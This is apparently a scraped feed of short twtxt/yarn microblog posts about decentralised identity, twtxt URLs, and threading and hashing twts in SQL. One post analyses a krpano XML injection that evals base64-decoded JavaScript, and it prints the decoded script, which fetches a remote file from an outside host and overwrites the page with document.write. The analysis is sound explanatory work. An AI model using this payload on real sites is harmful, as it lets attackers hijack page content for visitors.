i have probably watched through them a half dozen times each. some more :D
@nick@domain
support by doing a webfinger lookup to get the URL.
the
xml
parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.


fish
erman.
https://domain.com/.well-known/twtxt/:domain/:user
? the business card test is this can you write it on your business card and have someone you give it to be able to figure it out without added context?
- phone number: yes because everyone knows what a phone number is.
- email address: yes, everyone knows an email and their aol or prodigy will let them email.
- twitter/x/insta/pintrest handle: no, whats a twitter? do i need to sign up?
- domain name: yes its simple and you just type it in a browser right?
- twtxt url: kinda? its a bit long and is that a forward slash? or a backward slash?
By default the bsky.social urls all redirect to their feeds like: hmpxvt.bsky.social
Many custom urls will redirect to some kind of linktree or just their feed cwebonline.com or la.bonne.petite.sour.is or if you are a major outlet just to your web presence like https://theonion.com or https://netflix.com
Its just good SEO practice
Do all nostr addresses take you to the person if typed into a browser? That is the secret sauce.
No having to go to some random page first. no accounts. no apps to install. just direct to the person.
https://cses.fi/book/book.pdf


https://emilyliu.me/blog/open-network
When yarn used to have blogs I thought something like this would be a great feature. Having the blog comments tied to a twtxt subject for the blog post.

{{ .Profile.URI }}
and that is making my hashes wrong so it cannot delete or edit twts.

> Error: Error deleting last twt

So for twt metadata the lextwt parser currently supports values in the form
[key=value]
https://git.mills.io/yarnsocial/go-lextwt/src/branch/main/parser_test.go#L692-L698
Maybe one day enough states will make it into the NaPo InterCo to finally put the EC to rest.
we would need to come up with a way of registering with multiple brokers that can i guess forward to a reader broker. something that will retry if needed. need to read into how simplex handles multi brokers
i like this one
Really we should all think hard about how changes will break things and if those breakages are acceptable.
Super simple:
Making a reply:
0. If yarn has one use that. (Maybe do collision check?)
1. Make hash of twt raw no truncation.
2. Check local cache for shortest without collision
- in SQL:
select len(subject) where head_full_hash like subject || '%'
Threading:
1. Get full hash of head twt
2. Search for twts
- in SQL:
head_full_hash like subject || '%' and created_on > head_timestamp
The assumption being replies will be for the most recent head. If replying to an older one it will use a longer hash.
Though I suppose it has to be the greater of the two. But I don't even have one euro to start with.

its replacing the contents of body for some reason.

git show 64bf